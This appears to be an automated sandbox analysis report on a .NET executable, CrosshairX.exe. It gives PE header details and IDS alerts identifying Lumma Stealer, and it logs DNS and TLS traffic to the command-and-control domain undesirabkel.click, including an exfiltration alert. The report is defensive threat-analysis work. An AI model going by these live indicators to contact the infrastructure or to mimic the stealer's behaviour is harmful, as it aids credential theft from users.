DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6150	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x441e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x610a	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x41a4	0x4200	3fd86cd640fad1b0e3c70a019e57ee90	False	0.5025449810606061	data	5.884139579646745	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x441e	0x4600	2664d5807743a67b874ed987663755b7	False	0.9142299107142857	data	7.705443216316868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	0553d30171535035af0137d669b879da	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x10000	0x51600	0x51600	388a0ab9d7c7c982c0576a00e3188d44	False	1.000333021313364	data	7.999479237635455	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x81b4	0x3d60	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9851705702647657
RT_GROUP_ICON	0xbf14	0x14	data	1.05
RT_VERSION	0xbf28	0x30c	data	0.41923076923076924
RT_MANIFEST	0xc234	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:59:54.063845+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.4	64399	1.1.1.1	53	UDP
2025-01-05T19:59:54.564025+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:54.564025+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:58.180114+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:58.180114+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:58.714037+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:58.714037+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:59.190509+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:59.190509+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:59.804416+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T19:59:59.804416+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T20:00:00.900774+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-05T20:00:00.900774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-05T20:00:01.390799+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-05T20:00:02.258764+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-05T20:00:02.258764+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-05T20:00:03.450246+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-05T20:00:03.450246+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-05T20:00:05.062265+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-05T20:00:05.062265+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-05T20:00:07.871288+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-05T20:00:07.871288+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-05T20:00:08.402270+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49745	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:59:54.090238094 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.090265989 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:54.090332985 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.093405008 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.093419075 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:54.563946009 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:54.564024925 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.567518950 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.567528009 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:54.567866087 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:54.611327887 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.660849094 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.660924911 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:54.660970926 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.180124998 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.180207014 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.180389881 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.183423042 CET	49730	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.183434963 CET	443	49730	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.192821026 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.192845106 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.192939043 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.193231106 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.193238974 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.713977098 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.714036942 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.715784073 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.715789080 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.715980053 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:58.724911928 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.724935055 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:58.724965096 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190504074 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190542936 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190572023 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190608025 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.190615892 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190658092 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.190661907 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190850973 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190877914 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190893888 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.190898895 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.190969944 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.191026926 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.196691036 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.196718931 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.196758032 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.196768045 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.196774960 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.196825027 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.279882908 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.279928923 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.279975891 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.279980898 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.280009985 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.280055046 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.280247927 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.280256987 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.280275106 CET	49736	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.280286074 CET	443	49736	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.343902111 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.343920946 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.344008923 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.344341040 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.344348907 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.804339886 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.804415941 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.805737972 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.805744886 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.805936098 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.814652920 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.814815044 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.814835072 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 19:59:59.814898968 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 19:59:59.814904928 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.419581890 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.419676065 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.419751883 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.419925928 CET	49738	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.419935942 CET	443	49738	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.438806057 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.438844919 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.438930988 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.439217091 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.439229012 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.900682926 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.900774002 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.902136087 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.902143955 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.902364016 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:00.906553984 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.906661034 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:00.906689882 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:01.390790939 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:01.390888929 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:01.390935898 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:01.391305923 CET	49739	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:01.391330957 CET	443	49739	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:01.780157089 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:01.780232906 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:01.780303001 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:01.780801058 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:01.780816078 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.258651018 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.258764029 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.260252953 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.260266066 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.260467052 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.261676073 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.261811972 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.261843920 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.261909962 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.261923075 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.893434048 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.893503904 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.893599033 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.893871069 CET	49740	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.893892050 CET	443	49740	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.977159023 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.977195024 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:02.977277040 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.977575064 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:02.977588892 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.450151920 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.450246096 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.451764107 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.451771975 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.452018023 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.453365088 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.453495979 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.453501940 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.928706884 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.928786039 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:03.928832054 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.928992033 CET	49741	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:03.929003000 CET	443	49741	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:04.583852053 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:04.583904028 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:04.583967924 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:04.584750891 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:04.584765911 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.062169075 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.062264919 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.063421011 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.063431025 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.063652039 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.064815044 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.065517902 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.065551043 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.065634966 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.065680027 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.065788031 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.065810919 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.065915108 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.065953970 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.066087961 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066108942 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.066255093 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066282988 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.066297054 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066309929 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.066409111 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066432953 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.066454887 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066576004 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.066603899 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.075645924 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.075838089 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.075865984 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:05.075889111 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.075927973 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:05.080472946 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.373634100 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.373713970 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.373759985 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.373922110 CET	49742	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.373935938 CET	443	49742	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.378200054 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.378226995 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.378312111 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.378565073 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.378572941 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.871195078 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.871288061 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.872591019 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.872596979 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.872790098 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:07.873987913 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.874010086 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:07.874037027 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402276039 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402324915 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402363062 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.402371883 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402380943 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402414083 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.402426958 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402481079 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402515888 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.402518988 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402525902 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402561903 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.402565956 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.402981997 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.403013945 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.403021097 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.403023958 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.403062105 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.403419971 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.403491020 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.403533936 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.415272951 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.415282965 CET	443	49745	188.114.96.3	192.168.2.4
Jan 5, 2025 20:00:08.415318966 CET	49745	443	192.168.2.4	188.114.96.3
Jan 5, 2025 20:00:08.415323973 CET	443	49745	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:59:54.063844919 CET	64399	53	192.168.2.4	1.1.1.1
Jan 5, 2025 19:59:54.084418058 CET	53	64399	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:59:54.063844919 CET	192.168.2.4	1.1.1.1	0x648d	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:59:54.084418058 CET	1.1.1.1	192.168.2.4	0x648d	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:59:54.084418058 CET	1.1.1.1	192.168.2.4	0x648d	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

undesirabkel.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

